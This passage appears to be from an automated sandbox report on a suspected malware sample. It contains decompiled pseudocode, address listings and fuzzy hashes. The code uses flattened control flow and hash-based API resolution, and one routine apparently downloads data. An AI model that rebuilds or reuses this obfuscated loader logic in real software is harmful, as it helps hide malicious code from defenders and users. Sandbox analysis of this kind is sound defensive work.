									__eflags = _t85;
									if(_t85 == 0) {
										_t85 = E02273E80(_t57, E02273F20(0x667fdee), 0x47a72724, _t95);
										 *0x227df8c = _t85;
									}
									_t34 =  *0x227e2e4; // 0x4d8ea8
									_t35 =  *_t85( *((intOrPtr*)(_t34 + 0x20)),  *((intOrPtr*)(_t96 + 0x24)), 1, 0,  *_t95, _t95 + 4);
									_t58 =  *((intOrPtr*)(_t96 + 0x10));
									asm("sbb eax, eax");
									_t26 = ( ~_t35 & 0xf25e1306) + 0x3134f996;
									goto L2;
								} else {
									__eflags = _t26 - 0x3134f996;
									if(_t26 != 0x3134f996) {
										goto L40;
									} else {
										_t40 =  *0x227e168;
										__eflags = _t40;
										if(_t40 == 0) {
											_t40 = E02273E80(_t57, E02273F20(0x667fdee), 0xae646c41, _t95);
											 *0x227e168 = _t40;
										}
										 *_t40( *((intOrPtr*)(_t96 + 0x14)));
										_t58 =  *((intOrPtr*)(_t96 + 0x10));
										_t26 = 0x234da148;
										goto L2;
									}
								}
							}
						}
						goto L45;
						L40:
						__eflags = _t26 - 0x6df8497;
					} while (_t26 != 0x6df8497);
					return _t57;
					goto L45;
				}
			}

0x02271fb0
0x02271fb7
0x02271fbb
0x02271fbd
0x02271fc1
0x02271fc3
0x02271fc8
0x02271fc8
0x02271fc8
0x02271fc8
0x02271fd0
0x02271fd0
0x02271fd0
0x02271fd0
0x02271fd5
0x00000000
0x00000000
0x02271fdb
0x02272133
0x00000000
0x02271fe1
0x02271fe1
0x02271fe6
0x022720cb
0x022720d0
0x0227226f
0x02272271
0x02272276
0x02272276
0x00000000
0x022720d6
0x022720d6
0x022720db
0x00000000
0x022720e1
0x022720e1
0x022720e6
0x022720e8
0x022720fb
0x02272100
0x02272100
0x02272105
0x02272119
0x0227211b
0x0227211f
0x02272126
0x0227212b
0x00000000
0x0227212b
0x022720db
0x02271fec
0x02271fec
0x02272047
0x0227204c
0x0227204f
0x02272052
0x02272054
0x02272067
0x0227206c
0x0227206c
0x02272073
0x02272075
0x0227207a
0x0227207c
0x0227208f
0x02272094
0x02272094
0x0227209d
0x0227209f
0x022720a2
0x022720a4
0x0227227e
0x02272284
0x022720aa
0x022720aa
0x022720ae
0x022720b3
0x022720b7
0x022720bd
0x022720c1
0x00000000
0x022720c1
0x02271fee
0x02271ff3
0x02272007
0x0227200c
0x0227200f
0x02272011
0x02272024
0x02272029
0x02272029
0x02272034
0x02272036
0x0227203a
0x0227203d
0x00000000
0x02271ff5
0x02271ffa
0x00000000
0x02272000
0x02272000
0x00000000
0x02272000
0x02271ffa
0x02271ff3
0x02271fec
0x02271fe6
0x00000000
0x02271fdb
0x0227213d
0x02272142
0x02272204
0x02272209
0x00000000
0x0227220b
0x0227220b
0x02272210
0x02272212
0x02272225
0x0227222a
0x0227222a
0x02272234
0x02272241
0x02272243
0x02272249
0x02272250
0x00000000
0x02272250
0x02272148
0x02272148
0x022721f0
0x022721f4
0x00000000
0x022721fa
0x022721fa
0x00000000
0x022721fa
0x0227214e
0x0227214e
0x02272153
0x02272198
0x0227219e
0x022721a0
0x022721b8
0x022721ba
0x022721ba
0x022721c0
0x022721d7
0x022721d9
0x022721df
0x022721e6
0x00000000
0x02272155
0x02272155
0x0227215a
0x00000000
0x02272160
0x02272160
0x02272165
0x02272167
0x0227217a
0x0227217f
0x0227217f
0x02272188
0x0227218a
0x0227218e
0x00000000
0x0227218e
0x0227215a
0x02272153
0x02272148
0x00000000
0x0227225a
0x0227225a
0x0227225a
0x0227226e
0x00000000
0x0227226e

Strings

v>d', xrefs: 022721FA
Ei, xrefs: 02272013
v>d', xrefs: 02271FD0

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID:
String ID: v>d'$v>d'$Ei
API String ID: 0-262821485
Opcode ID: fcfc975058839cbba5be4c4c221fd8380e506e101e4b36af56e2b154b59545cd
Instruction ID: 350000cf7f210539253bb1f02fe394f8de718ef21e4215b6968a5241ec342850
Opcode Fuzzy Hash: fcfc975058839cbba5be4c4c221fd8380e506e101e4b36af56e2b154b59545cd
Instruction Fuzzy Hash: 0761F531B2C302DBCB14EEE6A894B2A33A6BF94344F10495AE845CB358DB70DC15DB97

Uniqueness

Uniqueness Score: -1.00%

Function 02272290, Relevance: 2.8, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02272290(signed int* __ecx, signed int* __edx) {
				char _v25;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				char _v124;
				signed int _v128;
				signed int* _v132;
				signed int* _v136;
				signed int* _v140;
				signed int* _v144;
				signed int* _v148;
				signed int* _v152;
				signed int* _v156;
				signed int* _v160;
				signed int* _v164;
				void* __ebx;
				void* __ebp;
				signed int* _t61;
				intOrPtr _t63;
				signed int _t69;
				intOrPtr _t72;
				signed int _t79;
				signed int _t85;
				signed int _t86;
				signed int _t88;
				signed int _t89;
				intOrPtr _t92;
				signed int _t93;
				signed int _t98;
				signed int _t104;
				signed int _t106;
				signed int _t111;
				signed int* _t112;
				signed int _t113;
				signed int _t117;
				intOrPtr* _t120;
				signed int* _t139;
				signed int _t142;
				signed int _t147;
				void* _t148;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t155;
				signed int** _t157;
				void* _t159;
				void* _t160;

				_t157 =  &_v140;
				_t104 = _v120;
				_t155 = _v120;
				_v132 = __edx;
				_t150 = 0x3b18423d;
				_v136 = __ecx;
				_v128 = 0;
				while(1) {
					L1:
					_t61 = _v140;
					do {
						while(1) {
							L2:
							_t159 = _t150 - 0x1c8b703e;
							if(_t159 > 0) {
								break;
							}
							if(_t159 == 0) {
								_t106 =  *0x227def8;
								__eflags = _t106;
								if(_t106 == 0) {
									_t106 = E02273E80(_t104, E02273F20(0x667fdee), 0xb11f83b0, _t155);
									 *0x227def8 = _t106;
								}
								_t63 =  *0x227e2e4; // 0x4d8ea8
								 *_t106( *((intOrPtr*)(_t63 + 0x18)), 0, 0,  &_v124);
								asm("sbb esi, esi");
								_t150 = (_t150 & 0x258fd75b) + 0x8cf6762;
								while(1) {
									L1:
									_t61 = _v140;
									goto L2;
								}
							} else {
								_t160 = _t150 - 0x13859baf;
								if(_t160 > 0) {
									__eflags = _t150 - 0x14926a00;
									if(_t150 != 0x14926a00) {
										goto L8;
									} else {
										_t69 =  *0x227e168;
										__eflags = _t69;
										if(_t69 == 0) {
											_t69 = E02273E80(_t104, E02273F20(0x667fdee), 0xae646c41, _t155);
											 *0x227e168 = _t69;
										}
										 *_t69(_v124);
										_t150 = 0x8cf6762;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								} else {
									if(_t160 == 0) {
										_t111 =  *0x227de98;
										__eflags = _t111;
										if(_t111 == 0) {
											_t111 = E02273E80(_t104, E02273F20(0x667fdee), 0xe5edfdec, _t155);
											_t61 = _v140;
											 *0x227de98 = _t111;
										}
										_t72 =  *0x227e2e4; // 0x4d8ea8
										 *_t111( *((intOrPtr*)(_t72 + 0x20)), _v124, 1, 0, _t61,  &_v120, _t155);
										_t112 = _v164;
										_t139 = _v160;
										asm("sbb esi, esi");
										_t150 = (_t150 & 0x0b40c3ab) + 0x14926a00;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									} else {
										if(_t150 == 0x3028e43) {
											_t113 =  *0x227e060;
											_v112 = 0x14;
											__eflags = _t113;
											if(_t113 == 0) {
												_t113 = E02273E80(_t104, E02273F20(0x667fdee), 0xe39c7ccc, _t155);
												 *0x227e060 = _t113;
											}
											_t79 =  *_t113(_v124, 2, _t104 + 0x60,  &_v112, 0);
											_t112 = _v156;
											__eflags = _t79;
											_t61 = _v160;
											_t139 = _v152;
											if(_t79 != 0) {
												_t150 = 0x14926a00;
												_v148 = 1;
												while(1) {
													L1:
													_t61 = _v140;
													goto L2;
												}
											}
											continue;
										} else {
											if(_t150 == 0x8cf6762) {
												_t147 = _v128;
												__eflags = _t147;
												if(_t147 == 0) {
													E02274250(_t104,  *_t139);
												}
												return _t147;
											} else {
												goto L8;
											}
										}
									}
								}
							}
							L51:
						}
						__eflags = _t150 - 0x2f4b92a8;
						if(__eflags > 0) {
							__eflags = _t150 - 0x3b18423d;
							if(_t150 != 0x3b18423d) {
								goto L8;
							} else {
								_t150 = 0x2f4b92a8;
								goto L2;
							}
						} else {
							if(__eflags == 0) {
								_t85 = _t112[1] + 1;
								__eflags = _t85 & 0x0000000f;
								if((_t85 & 0x0000000f) != 0) {
									_t85 = (_t85 & 0xfffffff0) + 0x10;
									__eflags = _t85;
								}
								_t151 = _t85 + 0x74;
								_t86 =  *0x227dea8;
								_t139[1] = _t151;
								__eflags = _t86;
								if(_t86 == 0) {
									_t86 = E02273E80(_t104, E02273F20(0xbb398380), 0x97f883e, _t155);
									 *0x227dea8 = _t86;
								}
								_t148 =  *_t86();
								_t88 =  *0x227dcec;
								__eflags = _t88;
								if(_t88 == 0) {
									_t88 = E02273E80(_t104, E02273F20(0xbb398380), 0xe9233692, _t155);
									 *0x227dcec = _t88;
								}
								_t89 =  *_t88(_t148, 8, _t151);
								_t139 = _v144;
								_t104 = _t89;
								 *_t139 = _t104;
								__eflags = _t104;
								if(_t104 == 0) {
									break;
								} else {
									_t53 = _t104 + 0x74; // 0x74
									_t61 = _t53;
									_t150 = 0x1c8b703e;
									_v152 = _t61;
									_t155 =  &_v116;
									_v132 = _v148[1];
									_t112 = _v148;
									goto L2;
								}
							} else {
								__eflags = _t150 - 0x1fd32dab;
								if(_t150 == 0x1fd32dab) {
									_t117 =  *0x227e0f8;
									_v116 = 0x6c;
									__eflags = _t117;
									if(_t117 == 0) {
										_t117 = E02273E80(_t104, E02273F20(0x667fdee), 0xd10d6746, _t155);
										 *0x227e0f8 = _t117;
									}
									_t92 =  *0x227e2e4; // 0x4d8ea8
									_t93 =  *_t117( *((intOrPtr*)(_t92 + 0x20)),  *((intOrPtr*)(_t92 + 0x1c)), 1, 0x40,  &_v108,  &_v116);
									__eflags = _t93;
									if(_t93 == 0) {
										_t112 = _v160;
										_t150 = 0x14926a00;
										_t139 = _v156;
										goto L1;
									} else {
										_t120 =  &_v25;
										_t142 = _t104;
										do {
											_t142 = _t142 + 1;
											 *((char*)(_t142 - 1)) =  *_t120;
											_t120 = _t120 - 1;
											__eflags = _t120 -  &_v120;
										} while (_t120 >=  &_v120);
										_t112 = _v160;
										_t150 = 0x3028e43;
										_t139 = _v156;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								} else {
									__eflags = _t150 - 0x2e5f3ebd;
									if(_t150 != 0x2e5f3ebd) {
										goto L8;
									} else {
										_t98 =  *0x227daac;
										_t152 = _t112[1];
										_t149 =  *_t112;
										__eflags = _t98;
										if(_t98 == 0) {
											_t98 = E02273E80(_t104, E02273F20(0xe66945e6), 0x70f7b8ec, _t155);
											 *0x227daac = _t98;
										}
										 *_t98(_v140, _t149, _t152);
										_t112 = _v136;
										_t157 =  &(_t157[3]);
										_t139 = _v132;
										_t150 = 0x13859baf;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								}
							}
						}
						goto L51;
						L8:
					} while (_t150 != 0xd360827);
					return _v128;
					goto L51;
				}
			}

0x02272290
0x02272297
0x0227229e
0x022722a4
0x022722a8
0x022722ad
0x022722b1
0x022722b5
0x022722b5
0x022722b5
0x022722c0
0x022722c0
0x022722c0
0x022722c0
0x022722c6
0x00000000
0x00000000
0x022722cc
0x02272422
0x02272428
0x0227242a
0x02272442
0x02272444
0x02272444
0x0227244f
0x0227245b
0x02272467
0x0227246f
0x022722b5
0x022722b5
0x022722b5
0x00000000
0x022722b5
0x022722d2
0x022722d2
0x022722d8
0x022723da
0x022723e0
0x00000000
0x022723e6
0x022723e6
0x022723eb
0x022723ed
0x02272400
0x02272405
0x02272405
0x0227240e
0x02272414
0x022722b5
0x022722b5
0x022722b5
0x00000000
0x022722b5
0x022722b5
0x022722de
0x022722de
0x02272378
0x0227237e
0x02272380
0x02272398
0x0227239a
0x0227239e
0x0227239e
0x022723ab
0x022723bb
0x022723bd
0x022723c3
0x022723c7
0x022723cf
0x022722b5
0x022722b5
0x022722b5
0x00000000
0x022722b5
0x022722e4
0x022722ea
0x0227230f
0x02272315
0x0227231d
0x0227231f
0x02272337
0x02272339
0x02272339
0x02272350
0x02272352
0x02272356
0x02272358
0x0227235c
0x02272360
0x02272366
0x0227236b
0x022722b5
0x022722b5
0x022722b5
0x00000000
0x022722b5
0x022722b5
0x00000000
0x022722ec
0x022722f2
0x02272627
0x0227262b
0x0227262d
0x02272631
0x02272631
0x02272642
0x00000000
0x00000000
0x00000000
0x022722f2
0x022722ea
0x022722de
0x022722d8
0x00000000
0x022722cc
0x0227247a
0x02272480
0x02272611
0x02272617
0x00000000
0x0227261d
0x0227261d
0x00000000
0x0227261d
0x02272486
0x02272486
0x02272578
0x02272579
0x0227257b
0x02272580
0x02272580
0x02272580
0x02272583
0x02272586
0x0227258b
0x0227258e
0x02272590
0x022725a3
0x022725a8
0x022725a8
0x022725af
0x022725b1
0x022725b6
0x022725b8
0x022725cb
0x022725d0
0x022725d0
0x022725d9
0x022725db
0x022725df
0x022725e1
0x022725e3
0x022725e5
0x00000000
0x022725eb
0x022725ef
0x022725ef
0x022725f5
0x022725fa
0x022725fe
0x02272604
0x02272608
0x00000000
0x02272608
0x0227248c
0x0227248c
0x02272492
0x022724e6
0x022724ec
0x022724f4
0x022724f6
0x0227250e
0x02272510
0x02272510
0x02272520
0x0227252f
0x02272531
0x02272533
0x02272563
0x02272567
0x0227256c
0x00000000
0x02272535
0x02272535
0x0227253c
0x02272540
0x02272542
0x02272545
0x02272548
0x0227254d
0x0227254d
0x02272551
0x02272555
0x0227255a
0x022722b5
0x022722b5
0x022722b5
0x00000000
0x022722b5
0x022722b5
0x02272494
0x02272494
0x0227249a
0x00000000
0x022724a0
0x022724a0
0x022724a5
0x022724a8
0x022724aa
0x022724ac
0x022724bf
0x022724c4
0x022724c4
0x022724cf
0x022724d1
0x022724d5
0x022724d8
0x022724dc
0x022722b5
0x022722b5
0x022722b5
0x00000000
0x022722b5
0x022722b5
0x0227249a
0x02272492
0x02272486
0x00000000
0x022722f8
0x022722f8
0x0227230e
0x00000000
0x0227230e

Strings

l, xrefs: 022724EC
Ei, xrefs: 022724AE

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID:
String ID: l$Ei
API String ID: 0-2145112675
Opcode ID: 05fb2767a39fa14ea4010ac182ebdcb8bb95c9518d9473e7689054bce0e7b3b0
Instruction ID: 0476b83d1c6e9ed964162ceb9f53c75d0fdb9338bb9acb3c8b18d1d0d2204893
Opcode Fuzzy Hash: 05fb2767a39fa14ea4010ac182ebdcb8bb95c9518d9473e7689054bce0e7b3b0
Instruction Fuzzy Hash: 1991A471A1C302DBD718DEA4D494B6BB7E2BB88304F054A5DE8559B358DB70DC098BD3

Uniqueness

Uniqueness Score: -1.00%

Function 022729B0, Relevance: .2, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E022729B0(intOrPtr __ecx, intOrPtr* __edx) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v24;
				intOrPtr _v32;
				void* __ebx;
				void* __ebp;
				void* _t15;
				intOrPtr* _t16;
				intOrPtr* _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr _t29;
				intOrPtr _t40;
				intOrPtr _t50;
				intOrPtr* _t60;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;
				void* _t71;

				_t40 = __ecx;
				_t65 = 0;
				_t67 = __edx;
				_v12 = __ecx;
				_t69 = 0;
				_t15 = 0x191cc4d8;
				goto L1;
				do {
					while(1) {
						L1:
						_t71 = _t15 - 0x217df346;
						if(_t71 > 0) {
							break;
						}
						if(_t71 == 0) {
							if( *((intOrPtr*)(_t67 + 4)) >= _t65) {
								goto L22;
							}
							_t15 = 0x8b7351;
							continue;
						}
						if(_t15 == 0x8b7351) {
							_t60 =  *0x227da90;
							if(_t60 == 0) {
								_t60 = E02273E80(_t40, E02273F20(0x2ba535f4), 0x824d1288, _t69);
								 *0x227da90 = _t60;
							}
							_t69 =  *_t60(_t40,  *_t67 +  *((intOrPtr*)(_t67 + 4)), _t65 -  *((intOrPtr*)(_t67 + 4)),  &_v16);
							if(_t69 == 0) {
								L23:
								_t19 =  *0x227dea8;
								_t66 =  *_t67;
								if(_t19 == 0) {
									_t19 = E02273E80(_t40, E02273F20(0xbb398380), 0x97f883e, _t69);
									 *0x227dea8 = _t19;
								}
								_t68 =  *_t19();
								_t21 =  *0x227e1a0;
								if(_t21 == 0) {
									_t21 = E02273E80(_t40, E02273F20(0xbb398380), 0x26c3f343, _t69);
									 *0x227e1a0 = _t21;
								}
								 *_t21(_t68, 0, _t66);
								L28:
								return _t69;
							} else {
								_t50 = _v32;
								if(_t50 == 0) {
									goto L22;
								}
								 *((intOrPtr*)(_t67 + 4)) =  *((intOrPtr*)(_t67 + 4)) + _t50;
								_t15 = 0x217df346;
								continue;
							}
						}
						if(_t15 != 0x191cc4d8) {
							goto L21;
						}
						_t15 = 0x2dfa6f2b;
					}
					if(_t15 == 0x2dfa6f2b) {
						_t16 =  *0x227dde8;
						_v8 = 4;
						if(_t16 == 0) {
							_t16 = E02273E80(_t40, E02273F20(0x2ba535f4), 0x46124712, _t69);
							 *0x227dde8 = _t16;
						}
						_push(0);
						_push( &_v8);
						_push( &_v4);
						_push(0x20000005);
						_push(_t40);
						if( *_t16() == 0) {
							break;
						}
						_t65 = _v24;
						if(_t65 == 0) {
							break;
						}
						_t15 = 0x3b63bdd0;
						goto L1;
					}
					if(_t15 != 0x3b63bdd0) {
						goto L21;
					}
					_t26 =  *0x227dea8;
					if(_t26 == 0) {
						_t26 = E02273E80(_t40, E02273F20(0xbb398380), 0x97f883e, _t69);
						 *0x227dea8 = _t26;
					}
					_t40 =  *_t26();
					_t28 =  *0x227dcec;
					if(_t28 == 0) {
						_t28 = E02273E80(_t40, E02273F20(0xbb398380), 0xe9233692, _t69);
						 *0x227dcec = _t28;
					}
					_t29 =  *_t28(_t40, 8, _t65);
					 *_t67 = _t29;
					if(_t29 == 0) {
						break;
					} else {
						_t40 = _v24;
						_t15 = 0x217df346;
						 *((intOrPtr*)(_t67 + 4)) = 0;
						goto L1;
					}
					L21:
				} while (_t15 != 0x330be30a);
				L22:
				if(_t69 != 0) {
					goto L28;
				}
				goto L23;
			}

0x022729b7
0x022729b9
0x022729bb
0x022729bd
0x022729c1
0x022729c3
0x022729c8
0x022729d0
0x022729d0
0x022729d0
0x022729d0
0x022729d5
0x00000000
0x00000000
0x022729db
0x02272a58
0x00000000
0x00000000
0x02272a5e
0x00000000
0x02272a5e
0x022729e2
0x022729f6
0x022729fe
0x02272a16
0x02272a18
0x02272a18
0x02272a32
0x02272a36
0x02272af6
0x02272af6
0x02272afb
0x02272aff
0x02272b12
0x02272b17
0x02272b17
0x02272b1e
0x02272b20
0x02272b27
0x02272b3a
0x02272b3f
0x02272b3f
0x02272b48
0x02272b4c
0x02272b53
0x02272a3c
0x02272a3c
0x02272a42
0x00000000
0x00000000
0x02272a48
0x02272a4b
0x00000000
0x02272a4b
0x02272a36
0x022729e9
0x00000000
0x00000000
0x022729ef
0x022729ef
0x02272a6d
0x02272b54
0x02272b59
0x02272b63
0x02272b76
0x02272b7b
0x02272b7b
0x02272b80
0x02272b86
0x02272b8b
0x02272b8c
0x02272b91
0x02272b96
0x00000000
0x00000000
0x02272b9c
0x02272ba2
0x00000000
0x00000000
0x02272ba8
0x00000000
0x02272ba8
0x02272a78
0x00000000
0x00000000
0x02272a7a
0x02272a81
0x02272a94
0x02272a99
0x02272a99
0x02272aa0
0x02272aa2
0x02272aa9
0x02272abc
0x02272ac1
0x02272ac1
0x02272aca
0x02272acc
0x02272ad0
0x00000000
0x02272ad2
0x02272ad2
0x02272ad6
0x02272adb
0x00000000
0x02272adb
0x02272ae7
0x02272ae7
0x02272af2
0x02272af4
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b94748a582d0895bb1e6692ee33f714e33d60d61a01c6137b8b61d1af30b73e
Instruction ID: d3ebd7af1cfc8f2354cdcad20f9cab622b3b92e634ab7d3ee7d25dceece784fc
Opcode Fuzzy Hash: 7b94748a582d0895bb1e6692ee33f714e33d60d61a01c6137b8b61d1af30b73e
Instruction Fuzzy Hash: 07418271B2C302DBDB34EEF9A89472B72EAEFD0244B14495DE845C7308EB74D8459B92

Uniqueness

Uniqueness Score: -1.00%

Function 00423382, Relevance: 42.5, APIs: 28, Instructions: 479
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00423382(intOrPtr __ecx) {
				int _t231;
				void* _t239;
				int _t240;
				void* _t260;
				void* _t267;
				void* _t268;
				CHAR* _t280;
				signed int _t336;
				int _t392;
				CHAR* _t407;
				signed int _t408;
				signed int _t409;
				int _t420;
				struct tagSIZE* _t421;
				int _t428;
				signed int _t437;
				int _t442;
				signed int _t446;
				void* _t447;
				int _t453;
				void* _t456;
				intOrPtr _t461;

				E00406520(E0042A9E0, _t456);
				_t461 =  *0x439c44; // 0x1
				 *((intOrPtr*)(_t456 - 0x50)) = __ecx;
				if(_t461 == 0) {
					_push(__ecx);
					E0041A41D(_t456 - 0x44, __eflags);
					 *(_t456 - 4) = 0;
					 *(_t456 - 0x30) = E00416528(__ecx);
					GetWindowRect( *(__ecx + 0x1c), _t456 - 0x28);
					OffsetRect(_t456 - 0x28,  ~( *(_t456 - 0x28)),  ~( *(_t456 - 0x24)));
					 *((intOrPtr*)(_t456 - 0x48)) = 0;
					 *((intOrPtr*)(_t456 - 0x4c)) = 0x42d72c;
					 *(_t456 - 4) = 1;
					E0041A611(_t456 - 0x4c, CreateSolidBrush(GetSysColor(6)));
					 *(_t456 - 0x5c) =  *(_t456 - 0x5c) & 0x00000000;
					 *((intOrPtr*)(_t456 - 0x60)) = 0x42d72c;
					 *(_t456 - 4) = 2;
					asm("sbb eax, eax");
					E0041A611(_t456 - 0x60, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 0xb)));
					 *(_t456 - 0x54) =  *(_t456 - 0x54) & 0x00000000;
					 *(_t456 - 0x58) = 0x42d72c;
					 *(_t456 - 4) = 3;
					asm("sbb eax, eax");
					E0041A611(_t456 - 0x58, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 3)));
					 *(_t456 - 0x10) = GetSystemMetrics(6);
					 *(_t456 - 0x14) = GetSystemMetrics(5);
					_t428 = GetSystemMetrics(0x21);
					_t231 = GetSystemMetrics(0x20);
					__eflags =  *(_t456 - 0x30) & 0x00040600;
					_t442 = _t231;
					if(( *(_t456 - 0x30) & 0x00040600) != 0) {
						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
						InflateRect(_t456 - 0x28,  ~( *(_t456 - 0x14)),  ~( *(_t456 - 0x10)));
						E004232C5(_t456 - 0x44, _t456 - 0x28, _t442 -  *(_t456 - 0x14), _t428 -  *(_t456 - 0x10), _t456 - 0x60);
						_t407 =  &(( *(_t456 - 0x10))[ *(_t456 - 0x10)]);
						 *(_t456 - 0x74) = _t407;
						_t408 =  *(_t456 - 0x14);
						 *(_t456 - 0x18) = _t428 - _t407;
						_t336 = _t442 - _t408 + _t408;
						__eflags =  *(_t456 - 0x2f) & 0x00000002;
						 *(_t456 - 0x2c) = _t336;
						if(( *(_t456 - 0x2f) & 0x00000002) != 0) {
							_t409 =  *(_t456 - 0x18);
						} else {
							_t436 = _t428 -  *(_t456 - 0x74) +  *0x439c9c;
							_t455 = _t442 - _t408 + _t408 * 2 +  *0x439c98;
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x439c9c, _t336, 1, 0);
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28),  *((intOrPtr*)(_t456 - 0x1c)) - _t428 -  *(_t456 - 0x74) +  *0x439c9c,  *(_t456 - 0x2c), 1, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x439c9c,  *(_t456 - 0x2c), 1, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *((intOrPtr*)(_t456 - 0x1c)) - _t436,  *(_t456 - 0x2c), 1, 0);
							_t437 =  *(_t456 - 0x18);
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x439c98,  *(_t456 - 0x24), 1, _t437, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t442 - _t408 + _t408 * 2 +  *0x439c98,  *(_t456 - 0x24), 1, _t437, 0);
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x439c98,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t455,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
							_t336 =  *(_t456 - 0x2c);
							_t409 = _t437;
						}
						InflateRect(_t456 - 0x28,  ~_t336,  ~_t409);
					}
					__eflags =  *(_t456 - 0x2e) & 0x000000c0;
					if(( *(_t456 - 0x2e) & 0x000000c0) == 0) {
						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
						goto L25;
					} else {
						asm("movsd");
						asm("movsd");
						_t240 =  *0x439c9c; // 0x0
						asm("movsd");
						asm("movsd");
						_t446 =  *(_t456 - 0x10);
						 *(_t456 - 0x64) = _t240 + _t446 +  *(_t456 - 0x24);
						E004232C5(_t456 - 0x44, _t456 - 0x70,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
						InflateRect(_t456 - 0x70,  ~( *(_t456 - 0x14)),  ~_t446);
						asm("sbb eax, eax");
						FillRect( *(_t456 - 0x40), _t456 - 0x70,  ~(_t456 - 0x58) &  *(_t456 - 0x54));
						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
						_t260 =  *0x439ca0; // 0x0
						__eflags = _t260;
						if(_t260 != 0) {
							 *(_t456 - 0x18) = SelectObject( *(_t456 - 0x40), _t260);
							_t280 =  *0x436980; // 0x436994
							 *(_t456 - 0x10) = _t280;
							 *(_t456 - 4) = 4;
							E004140EE( *((intOrPtr*)(_t456 - 0x50)), _t456 - 0x10);
							_t421 = _t456 - 0x78;
							asm("sbb esi, esi");
							_t453 = ( ~( *(_t456 - 0x30) & 0x00080000) &  *0x439c98) +  *(_t456 - 0x70);
							GetTextExtentPoint32A( *(_t456 - 0x3c),  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), _t421);
							__eflags =  *(_t456 - 0x78) -  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70);
							if( *(_t456 - 0x78) <=  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70)) {
								E0041A240(_t456 - 0x44, 6);
								asm("cdq");
								_t453 = _t453 + ( *((intOrPtr*)(_t456 - 0x68)) - _t453 - _t421 >> 1);
								__eflags = _t453;
							}
							GetTextMetricsA( *(_t456 - 0x3c), _t456 - 0xb8);
							InflateRect(_t456 - 0x70, 0, 1);
							asm("cdq");
							asm("sbb eax, eax");
							E00419E62(GetSysColor(( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) & 0x000000f6) + 0x13), _t456 - 0x44, _t302);
							E00419DAA(_t456 - 0x44, 1);
